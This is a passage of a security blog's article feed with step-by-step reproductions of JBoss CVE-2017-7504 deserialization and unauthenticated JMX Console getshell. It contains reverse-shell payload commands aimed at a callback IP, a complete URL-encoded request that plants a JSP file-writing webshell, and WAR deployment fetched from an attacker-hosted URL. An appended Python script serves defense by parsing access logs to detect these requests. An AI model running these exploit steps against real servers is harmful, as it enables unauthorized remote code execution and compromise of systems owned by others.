<tag> JBOSS </tag>
<tag> CVE-2017-12149 </tag>
</tags>
</entry>
<entry>
<title>Jboss CVE-2017-7504</title>
<link href="/article/45a5e5d3.html"/>
<url>/article/45a5e5d3.html</url>
<content type="html"><![CDATA[<h2 id="JBOSSMQ-JMS-CVE-2017-7504-集群反序列化漏洞-4-X"><a href="#JBOSSMQ-JMS-CVE-2017-7504-集群反序列化漏洞-4-X" class="headerlink" title="JBOSSMQ JMS CVE-2017-7504 cluster deserialization vulnerability (4.x)"></a>JBOSSMQ JMS CVE-2017-7504 cluster deserialization vulnerability (4.x)</h2><h3 id="0x01漏洞描述"><a href="#0x01漏洞描述" class="headerlink" title="0x01 Description"></a>0x01 Description</h3><p>In JBoss AS 4.x and earlier, HTTPServerILServlet.java in the JMS over HTTP Invocation Layer of the JbossMQ implementation has a deserialization vulnerability; a remote attacker can execute arbitrary code by sending crafted serialized data.</p><h3 id="0x02影响版本"><a href="#0x02影响版本" class="headerlink" title="0x02 Affected versions"></a>0x02 Affected versions</h3><p>JBoss AS 4.x and earlier</p><h3 id="0x03漏洞利用"><a href="#0x03漏洞利用" class="headerlink" title="0x03 Exploitation"></a>0x03 Exploitation</h3><hr><p>1. First check whether the target JBoss is vulnerable by visiting<br>/jbossmq-httpil/HTTPServerILServlet directly. A 200 response or a file download suggests the vulnerability is present.<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606636_20201208220941482_14194.png"><br>Here we use the <a href="https://github.com/joaomatosf/JavaDeserH2HC">JavaDeserH2HC</a> tool to exploit it and try to get a shell back directly<br>Note: this tool is used on Linux</p><pre class="line-numbers language-none"><code class="language-none">javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap &lt;callback IP&gt;:&lt;port&gt;
curl http://&lt;target IP&gt;:8080/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ReverseShellCommonsCollectionsHashMap.ser</code></pre><p><strong>Listening on the port:</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606636_20201208221156161_24717.png"><br>Reverse shell received<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607606636_20201208221425595_28775.png"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> JBOSS </tag>
<tag> CVE-2017-7504 </tag>
</tags>
</entry>
<entry>
<title>Jboss JMX Console未授权访问Getshell</title>
<link href="/article/be1e1f83.html"/>
<url>/article/be1e1f83.html</url>
<content type="html"><![CDATA[<p>[toc]</p><h2 id="Jboss-JMX-Console未授权访问Getshell"><a href="#Jboss-JMX-Console未授权访问Getshell" class="headerlink" title="JBoss JMX Console unauthenticated access getshell"></a>JBoss JMX Console unauthenticated access getshell</h2><h3 id="漏洞描述:"><a href="#漏洞描述:" class="headerlink" title="Vulnerability description:"></a>Vulnerability description:</h3><p>The <code>/jmx-console/HtmlAdaptor</code> path of JBoss is reachable from the network and, in the default configuration of older releases, has no authentication at all. An attacker can therefore open the JMX console and invoke any MBean operation it exposes, including the deployer operations that write files into the <code>deploy/</code> directory or fetch an application from a remote URL. The console is meant for administrators only: remove <code>jmx-console.war</code> from <code>deploy/</code> when it is not needed, or enable the commented-out security-constraint in <code>jmx-console.war/WEB-INF/web.xml</code> and set a strong password in <code>props/jmx-console-users.properties</code>.</p><h3 id="影响版本:"><a href="#影响版本:" class="headerlink" title="Affected versions:"></a>Affected versions:</h3><p>JBoss 4.x and earlier.</p><h3 id="利用方式:"><a href="#利用方式:" class="headerlink" title="Exploitation:"></a>Exploitation:</h3><blockquote><p>On JBoss 4.x the /jmx-console/ back end allows unauthenticated access; once inside, a WAR can be deployed directly to get a shell. If a login is required, try brute-forcing weak credentials (this is analogous to Tomcat's manager WAR-deployment weakness).</p></blockquote>
<h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="Environment setup:"></a>Environment setup:</h3><h4 id="0x01-使用docker搭建漏洞环境"><a href="#0x01-使用docker搭建漏洞环境" class="headerlink" title="0x01: Build the vulnerable environment with Docker"></a>0x01: Build the vulnerable environment with Docker</h4><blockquote><p>One-line Docker install<br>This is the recommended way. On a machine without Docker, run the following as root to install the latest Docker:<br>curl -s <a href="https://get.docker.com/">https://get.docker.com/</a> | sh</p></blockquote><p>1. Search for the vulnerable image:</p><pre class="line-numbers language-none"><code class="language-none">sudo docker search testjboss<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/5759958140263.png"><br>2. Pull the image:</p><pre class="line-numbers language-none"><code class="language-none">sudo docker pull testjboss/jboss<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/3844100168689.png"><br>3. List the local images:</p><pre class="line-numbers language-none"><code class="language-none">sudo docker images<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/1123202156556.png"><br>4. Run the container; the console is then reachable at http://IP (host port 80 is mapped to port 8080 inside the container):</p><pre class="line-numbers language-none"><code class="language-none">sudo docker run -p 80:8080 -d testjboss/jboss<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><hr>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="Reproduction:"></a>Reproduction:</h3><h4 id="Method-1"><a href="#Method-1" class="headerlink" title="Method 1:"></a>Method 1:</h4><p>Browse to http://Your IP/jmx-console to reach the JBoss console directly, then request the following URL. It calls the <code>store</code> operation of the <code>jboss.admin:service=DeploymentFileRepository</code> MBean, which writes a JSP file into a new WAR folder under the deploy directory:</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p>Parameters in the URL: arg0 is the WAR name (the folder created under deploy/), arg1 the file name, arg2 the file extension and arg3 the file content. Each argN is preceded by an argType giving its Java type, and the pairs must stay in this order.<br>URL-decoded, the request reads:</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%+if(request.getParameter("f")!=null)(new+java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());+%>&argType=boolean&arg4=True<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><strong>The JSP it drops is a file writer: f is the file name, t the file content, written relative to the web application's root.</strong></p><p>Write a hack.txt file:</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/August/shell.jsp?f=hack.txt&t=Are you script boy<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/5198123176722.png"><br>Then request hack.txt to confirm the write:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/758824169391.png"></p><hr>
<h4 id="Method-2"><a href="#Method-2" class="headerlink" title="Method 2:"></a>Method 2:</h4><p>First package a JSP webshell into a WAR (this needs a JDK). In the directory containing the JSP, run from cmd:</p><pre class="line-numbers language-none"><code class="language-none">jar cvf shell.war test.jsp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/3179648165946.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/911249179580.png"><br>If you get an access-denied error, run cmd as administrator.<br><strong>Host the WAR on a web server you control:</strong></p><pre class="line-numbers language-none"><code class="language-none">python3 -m http.server 777 # start a temporary web server with Python on port 777<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/4961950174686.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/4532151155927.png" alt="\\"></p><hr><p>Now open /jmx-console/ on the target (unauthenticated on JBoss 4.x; if it asks for credentials, try weak passwords as described above).<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/1174650177184.png"><br>Under jboss.deployment (JBoss's built-in deployer), click <code>flavor=URL,type=DeploymentScanner</code>, the scanner that deploys from a URL.<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/1104253178367.png"><br>You can also go there directly by URL:</p><pre class="line-numbers language-none"><code class="language-none">http://Your IP/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="vx_images/4759354173503.png"><br>On the MBean page find the <code>void addURL()</code> operation and pass it the URL of the hosted WAR (for example http://ATTACKER_IP:777/shell.war); the scanner fetches and deploys it.<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/5814456160183.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/3690404160713.png"><br>Check whether the deployment succeeded:<br>go back to the jmx-console landing page and look under jboss.web.deployment; if the WAR is listed there, it is deployed. If it is not shown yet, refresh a few times or wait a moment until the deployed WAR appears.</p><h3 id="检测工具"><a href="#检测工具" class="headerlink" title="Detection tool:"></a>Detection tool:</h3><p>Detection tool: jexboss, a JBoss vulnerability scanner and exploitation tool written in Python. It detects and exploits the web-console, jmx-console and JMXInvokerServlet exposures and can return a shell.<br>Usage:</p><pre class="line-numbers language-none"><code class="language-none">python jexboss.py -u http://ip:port<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/2538330172164.png"></p>]]></content>
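<![CDATA[<p>Both methods above go through <code>/jmx-console/HtmlAdaptor</code>, and the Method 1 URL shows the shape of an <code>invokeOpByName</code> call: an MBean ObjectName, a method name, and an ordered run of <code>argType</code>/<code>argN</code> pairs. The script below is an added example, not code from the article or from jexboss: it parses such requests out of access-log lines, decodes the arguments in order, and for the two operations abused here reports exactly what was written or fetched (the <code>deploy/August.war/shell.jsp</code> path is why <code>/August/shell.jsp</code> became reachable). The log lines are constructed; the first carries the article's own query string, and the <code>addURL</code> line assumes the WAR was hosted at http://203.0.113.9:777/shell.war.</p>

```python
"""Decode and triage jmx-console HtmlAdaptor invoke requests from access logs.

Added example, not code from the original article. It reconstructs which MBean
operation a request invoked and, for DeploymentFileRepository.store(), which
file would land in deploy/. The access-log lines at the bottom are constructed;
the first one carries the exact query string used in Method 1.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# The two operations the article abuses, keyed by (MBean ObjectName, operation):
# Method 1 writes a file under deploy/, Method 2 pulls a WAR from a remote URL.
DANGEROUS_OPS = {
    ("jboss.admin:service=DeploymentFileRepository", "store"): "file written to deploy/",
    ("jboss.deployment:type=DeploymentScanner,flavor=URL", "addURL"): "WAR deployed from remote URL",
}

# Request line of a common/combined-format access log entry.
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def parse_invoke(url: str):
    """Describe an HtmlAdaptor invokeOpByName request as a dict, or None.

    Arguments travel as repeated argType/argN pairs, so the query is walked in
    order with parse_qsl instead of being collapsed into a mapping."""
    parts = urlsplit(url)
    if not re.sub(r"/+", "/", parts.path).endswith("/jmx-console/HtmlAdaptor"):
        return None
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    fields = dict(pairs)
    if fields.get("action") != "invokeOpByName":
        return None
    types, args = [], {}
    for key, value in pairs:
        if key == "argType":
            types.append(value)
        elif re.fullmatch(r"arg\d+", key):
            args[int(key[3:])] = value
    return {
        "name": fields.get("name", ""),
        "method": fields.get("methodName", ""),
        "types": types,
        "args": [args[i] for i in sorted(args)],
    }


def describe(invoke: dict) -> str:
    """One triage line per invoke; spells out the path a store() call creates
    (deploy/<folder>/<name><ext>, which is why /August/shell.jsp became reachable)."""
    key = (invoke["name"], invoke["method"])
    effect = DANGEROUS_OPS.get(key)
    if effect is None:
        return f"invoke {invoke['name']}.{invoke['method']}"
    if invoke["method"] == "store" and len(invoke["args"]) >= 3:
        folder, name, ext = invoke["args"][:3]
        return f"{effect}: deploy/{folder}/{name}{ext}"
    if invoke["method"] == "addURL" and invoke["args"]:
        return f"{effect}: {invoke['args'][0]}"
    return effect


def scan_log(lines):
    """Return (client_ip, description) for every dangerous invoke in the log."""
    hits = []
    for line in lines:
        m = _REQ_RE.search(line)
        if not m:
            continue
        invoke = parse_invoke(m.group("target"))
        if invoke and (invoke["name"], invoke["method"]) in DANGEROUS_OPS:
            hits.append((line.split()[0], describe(invoke)))
    return hits


# Constructed access-log sample (IPs from the documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Sep/2020:10:48:17 +0800] "GET /jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True HTTP/1.1" 200 1312',
    '203.0.113.7 - - [07/Sep/2020:10:49:50 +0800] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 9876',
    '203.0.113.7 - - [07/Sep/2020:10:50:40 +0800] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodName=addURL&argType=java.net.URL&arg0=http%3A%2F%2F203.0.113.9%3A777%2Fshell.war HTTP/1.1" 200 540',
    '203.0.113.7 - - [07/Sep/2020:10:51:02 +0800] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 540',
    '198.51.100.2 - - [07/Sep/2020:10:51:30 +0800] "GET /August/shell.jsp?f=hack.txt&t=Are+you+script+boy HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for client, what in scan_log(SAMPLE_LOG):
        print(f"{client}: {what}")
```

<p>One caveat for the Method 2 flow as clicked in the console UI: the HtmlAdaptor forms POST <code>action=invokeOp</code> with a <code>methodIndex</code> rather than a method name, and the arguments sit in the request body, so a plain access log only shows the bare POST (the fourth sample line). Catching that path needs request bodies and the MBean's operation list, not just the query string this script reads.</p>]]>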
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> JBOSS </tag>
<tag> JBOSS未授权访问Getshell </tag>
</tags>
</entry>
</search>